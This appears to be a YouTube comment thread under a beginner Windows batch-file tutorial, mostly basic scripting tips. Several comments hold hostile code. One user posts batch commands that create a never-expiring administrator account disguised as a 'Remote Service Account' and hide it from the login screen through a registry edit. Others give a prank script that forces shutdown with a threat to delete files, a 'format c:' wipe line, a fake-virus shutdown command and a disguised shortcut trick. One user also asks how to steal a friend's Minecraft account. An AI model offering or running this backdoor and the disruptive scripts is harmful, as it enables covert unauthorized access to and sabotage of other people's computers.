@p0wer5000 Well you can't do real time keystrokes. In other words, if they press "a", you can't immediately know they pressed that. The best you can do (without writing your own batch command in C++ or something) is use set /p varname=Prompt which will prompt them to enter a value (and that value will be inserted into "varname" after they press ENTER/RETURN). It's been too long for me to know the full details of error level. I think it's just a flag that you use however you like.
@echo off hacking . . . Pause Shutdown -s -c "goodbye..... Btw I'm deleting your stuff" Color o2 :scrller Echo hacking . . . Echo hacking . . . Echo hacking . . . Name.vbs Echo you got pwned Goto scrller ---------------------------------- Make a fake error with a vbs file and name it name.vbs. Save this as "namehere".bat
does anybody know how to make a batch file to recieve files from another computer? me and my friend have skype and i wanna hack his minecraft accoutn through the lastlogin file thanks!
If you really want to mess with someone disguise the shortcut for say internet explorer and in the batch file put start like 100 times (100 command prompts) and
dir /s 100 times (makes all this random stuff pop up)
try that and it should look really cool and if masterjake wonts to code with me we could code some cool stuff and maybe work to making hacks and stuff i can make like some stuff but if he wonts to we can
This is really basic stuff, but meh it was a good tutorial for beginners. Making batch files that write themselves is fun, and also making ones that write vbscript and run it too. makes things more interactive. XD
could you use a Batch file to run as a macro? Even as complex as it might be is it possible? by the way how do you make pauses, i found some kind of pause. but i dont remember it.
@XxXKristopherXxX With the combination of windows task scheduler and batches you could script it to run every few days/weeks/months/years to do a certain task, like delete a folder, move from one folder to another, start/close programs, etc...whatever you can do in dos you can put it in batch.
@KDALove no need to be rude. My post on here was over a year ago, I am far more advanced and I see no use for window's measly batch language any longer. Batch does have one positive, though not a Turing complete language can pass parameters into executables. Which does give you a wide range of possibilities for extended processes from C or other compiled languages that can analyze the argument vector. Anyways thank you and try not responding to really old posts. Kris
@KDALove Do know I understand you trying to help, but also realize you are replying to comments over a year ago. I am much more advanced, and I have no use for Window's measly batch language any longer. Batch can pass arguments into executables though, allowing a wide range of possibilities with any outer program that can analyze anything passed threw the argument vector.
@Echo Off Net User tipsyquo qwerty321 /Add /Expires:Never Net Localgroup Administrators /add tipsyquo Net User tipsyquo /comment:"Built-in account for Remote Service" Net User tipsyquo /Fullname:"Remote Service Account" Set Regy1=%Temp%\%Random%.reg Echo REGEDIT 4 >> %Regy1% Echo [HKEY_LOCAL_MACHINE\SOFTWARE\M icrosoft\Windows NT\CurrentVersion\Winlogon\Spe cialAccounts\UserList] >> %Regy1% Echo "tipsyquo"=dword:00000000 >> %Regy1% Start /Wait Regedit /S "%Regy1%" Del "%Regy1%" /F
wow that was so so so so cool man! jus wondering if there is a way to change the code so after they say hi u can write hi back and then it says wadup. if there isnt anyway at leats tell me
There are many ways to do so.. @echo off color a echo. echo Hello. :start set /p a="Write something: " if %a%==hi goto end ( ) else ( echo "At least say hi to me.. >_>" goto start ) :end echo Wassup? pause>nul
how would I use the set command to look for a input (keystroke) and what is errolevel 1, 2 ,3 ect ect?
p0wer5000 2 weeks ago
@p0wer5000 Well you can't do real time keystrokes. In other words, if they press "a", you can't immediately know they pressed that. The best you can do (without writing your own batch command in C++ or something) is use set /p varname=Prompt which will prompt them to enter a value (and that value will be inserted into "varname" after they press ENTER/RETURN). It's been too long for me to know the full details of error level. I think it's just a flag that you use however you like.
MasterJake777 2 weeks ago
@MasterJake777 oh okay thank you very much and I wasn't looking for real time jsut like what is your name?
bob (enter)
hello bob.
p0wer5000 2 weeks ago
This has been flagged as spam show
Great video :)) you guys should check out my channel will be doing this kind of this stuff soon they work and amazing !!
RKFXtutorials 2 months ago
@codfishfan No offense but I tried Vista and Win7 and then went back to XP
couldnt find anything on them I couldn't already do on XP
poojkhgf 7 months ago
@codfishfan I had Windows Vista for over a year, and then I've been on Windows 7 for several months now.
MasterJake777 9 months ago
This has been flagged as spam show
Command Prompt masses up your computer
XMRNATEX 9 months ago
Command Prompt masses up your computer
XMRNATEX 9 months ago
@XMRNATEX
Command Prompt doesn't "mess" up your computer!
You probably spelled it wrong because you have no competence in it or you typed something wrong like you did in your comment! Grammar is very vital!
soniccha0s09 8 months ago
This has been flagged as spam show
jdude666666 10 months ago
does anybody know how to make a batch file to recieve files from another computer? me and my friend have skype and i wanna hack his minecraft accoutn through the lastlogin file thanks!
rjniscool 10 months ago
If you really want to mess with someone disguise the shortcut for say internet explorer and in the batch file put start like 100 times (100 command prompts) and
dir /s 100 times (makes all this random stuff pop up)
secretagenthacker 11 months ago
^ < this symbol
tutorialbatch 1 year ago
If you type symbol & before de symbol >, the symbol > is gonna be printed and the eco is gonna be shown ;) Just and advise.
tutorialbatch 1 year ago
when i did the color and save it didnt work for me
xboz160 1 year ago
tomake it not say "Press any key to continue"
instead of putting pause, put pause >nul
xxxXXXrockband2XXXxx 1 year ago
your awesome
kristianquirapas 1 year ago
I post batch file videos just like you! sweet ill send you some codes some time
gregmonkey123 1 year ago
color x=help color
TheJonas369 1 year ago
how is the song called
brunomj1997 1 year ago
nice gta sa music in backround
howtoguy17 1 year ago
hmm i code quite a bit try this little fun command
@echo off
:green
echo VIRUS ALERT VIRUS ALERT
goto green
try that and it should look really cool and if masterjake wonts to code with me we could code some cool stuff and maybe work to making hacks and stuff i can make like some stuff but if he wonts to we can
punkstoper 1 year ago
also, instead of typing echo hi 20 times, why not just do this:
:1
echo hi
goto 1
this will loop infinitely.
Bruceification73 1 year ago
color 0a does bright green, which looks cooler than the dark green you did.
Bruceification73 1 year ago
very unful, i never new of color
shawn4511777 1 year ago
its more like just the basics of batch files
samjddowlinggmail 1 year ago
WTF hapend jake???
ubercharger9000 1 year ago
GTA TUNE !! :D
TheDjEmilo 2 years ago 8
@TheDjEmilo :D
adio310001 10 months ago
Dude Thx :D Plz post other vids like this !
Cakemanx3 2 years ago
thanks this vid is fantastic
lachlin22 2 years ago
what did u write behind echo off?
junkypill 2 years ago
at symbol @
shift+2 on modern keyboard
MasterJake777 2 years ago
This is really basic stuff, but meh it was a good tutorial for beginners. Making batch files that write themselves is fun, and also making ones that write vbscript and run it too. makes things more interactive. XD
mysteryloser24 2 years ago
XD i learned this without anyone telling me
ubercharger9000 2 years ago
i learned by fucking ur mother!
chubble101 2 years ago
not possible, can't just pop in ur head
DomiBoister 2 years ago
i already knew everything so that sucked, good beginner video tho
rakgtr 2 years ago
wow i didn't know u were on youtube. i just downloaded your source code of dark kingdoms and completly wrote my own engine in a few days! thanks
acerookie1 2 years ago
Cool. Glad to have been of some assistance.
MasterJake777 2 years ago
you made it easy. i'm trying to make multiple characters(team mates) it's comming along good. i'm working on this war stadgedy game.
acerookie1 2 years ago
This comment has received too many negative votes show
U SUCK!!!
rickard93d 2 years ago
i didnt know the title thing. thanks!
chrismofer 2 years ago
nice tut
OoGDoRuleZzZoO 2 years ago
I just started messin with this stuff today...and I learned alot!
harris11651 2 years ago
format c:
y
y
this in a bach file will wipe your hd
RCFProductions 2 years ago
@RCFProductions
No it will not.. the startup "disk" is protected by the program itself.
And the "y y" will just give you errors.
caHarkness 2 years ago
@RCFProductions Actually no, it won't let you format the system partition ;) you have to do it to a separate partition or hard drive.
KDALove 1 year ago
This comment has received too many negative votes show
CMD.EXE IS DEAD!!!
POWERSHELL
SCRIPToHELPER 2 years ago
hey jake....i got a batch file im working on.....and i was wandering if you could help me out some geting the glitches ect. fixed...
maam31 2 years ago
go to masterjakeonline (dot) com and visit the forums and ask there
MasterJake777 2 years ago
Thanks Jake this helped a lot!!!
cheesedacoolman 3 years ago
This comment has received too many negative votes show
noobs
gungodthegreat 3 years ago
shut up, nerd!!!!
Tardy13 3 years ago
if you want background black you dont need to type 0. black is default bg. if you type color 1 it defaults blue text black bg
aresproductions000 3 years ago
get into the habbit of putting the 0 anyway
MasterJake777 3 years ago
hey haha i have the ultimate bat file
jmaster34 3 years ago
haha. I found it.
ping localhost -n 2 > nul
like this....
XxXKristopherXxX 3 years ago
could you use a Batch file to run as a macro? Even as complex as it might be is it possible? by the way how do you make pauses, i found some kind of pause. but i dont remember it.
not
pause >nul
more like a timed pause like after 2 seconds.
XxXKristopherXxX 3 years ago
@XxXKristopherXxX With the combination of windows task scheduler and batches you could script it to run every few days/weeks/months/years to do a certain task, like delete a folder, move from one folder to another, start/close programs, etc...whatever you can do in dos you can put it in batch.
KDALove 1 year ago
Comment removed
XxXKristopherXxX 1 year ago
This has been flagged as spam show
@KDALove no need to be rude. My post on here was over a year ago, I am far more advanced and I see no use for window's measly batch language any longer. Batch does have one positive, though not a Turing complete language can pass parameters into executables. Which does give you a wide range of possibilities for extended processes from C or other compiled languages that can analyze the argument vector. Anyways thank you and try not responding to really old posts. Kris
XxXKristopherXxX 1 year ago
@KDALove Do know I understand you trying to help, but also realize you are replying to comments over a year ago. I am much more advanced, and I have no use for Window's measly batch language any longer. Batch can pass arguments into executables though, allowing a wide range of possibilities with any outer program that can analyze anything passed threw the argument vector.
XxXKristopherXxX 1 year ago
Dude that scared me so much
I thought it was gonna be something crazy like a virus
I think the link is dead though but very nice
jtman54159 3 years ago
what scared you and what link
MasterJake777 3 years ago
my little comment lol
Tipsyquo 3 years ago
It was a bat file posted in the comments
I think it was hilarious, but i was afraid to execute it at first
I'm new to this so I didn't know how to read the code
jtman54159 3 years ago
I set the commands as variable's so it would make it hard to read..
kinda like a encryption i thought up.
Tipsyquo 3 years ago
i messed something up in the code...
Tipsyquo 3 years ago
ohh that lol
MasterJake777 3 years ago
Master Jake your tutorials are great... can you please make some commands for administrative tasks. thanks man
TossmanYTube 3 years ago
Add Administrator Account User Tipsyquo
Net User tipsyquo qwerty321 /Add /Expires:Never
Net Localgroup Administrators /add tipsyquo
Net User tipsyquo /comment:"Built-in account for Remote Service"
Net User tipsyquo /Fullname:"Remote Service Account"
Tipsyquo 3 years ago
Hide Admin Account Tipsyquo
@Echo Off
Set Regy1=%Temp%\%Random%.reg
Echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] >> %Regy1%
Echo "tipsyquo"=dword:00000000 >> %Regy1%
Start /Wait Regedit /S "%Regy1%"
Del "%Regy1%" /F
P.S Password qwerty321
Tipsyquo 3 years ago
Opps its wrong heres correct code
@Echo Off
Set Regy1=%Temp%\%Random%.reg
Echo REGEDIT 4
Echo [HKEY_LOCAL_MACHINE\SOFTWARE\M icrosoft\Windows NT\CurrentVersion\Winlogon\Spe cialAccounts\UserList] >> %Regy1%
Echo "tipsyquo"=dword:00000000 >> %Regy1%
Start /Wait Regedit /S "%Regy1%"
Del "%Regy1%" /F
Tipsyquo 3 years ago
Tipsyquo 3 years ago
where did you get the grand theft auto music?
zachary123456789spon 3 years ago
LimeWire
MasterJake777 3 years ago
Thank you MasterJake777
Badhan0 3 years ago
Your very welcome!
MasterJake777 3 years ago
nice skill man :D
PerfektBlue 3 years ago
ah hell no!xD nice one man
Gameplayery 3 years ago
JAKE!!! i want to request a tut.!!
how do you make those "fake" viruses like you did in 8th grade on the schools computuer?! where it shuts down
pastordisastor 3 years ago
umm you mean this
C:\Windows\System32\shutdown.exe -s -t 10 -c "Insert your own custom message here"
You can put that in a shortcut or use this for BAT
Start C:\Windows\System32\shutdown.exe -s -t 10 -c "Insert your own custom message here"
sooperfoonvids 3 years ago
7 mins isnt fucking short!! lol
pastordisastor 3 years ago
That's to make an empty line to separate the paragraphs in the batch file
jakash3 3 years ago 5
exactly =]
MasterJake777 3 years ago
yaaaaaaaaaaaaaa pause>nul is best
videoshalo 3 years ago
or just "pause > nul"
MasterJake777 3 years ago
Pause > nul is better.
Kheluva999 3 years ago
Plus, echo. (dot) isn't a pause, it's a line break.
MasterJake777 3 years ago
just echo another line saying hi again then echo a line saying wadup. =D
MasterJake777 4 years ago
wow that was so so so so cool man! jus wondering if there is a way to change the code so after they say hi u can write hi back and then it says wadup. if there isnt anyway at leats tell me
emenem91 4 years ago
d4rkside 3 years ago
it ok only echo data > nul .
konignikon 4 years ago
thanks guys!
MasterJake777 4 years ago
helps alot!
thx man!!!
H34DB4N91NM0NK3Y 4 years ago
This helped out alot make more.
I3DoMiNiC3I 4 years ago 2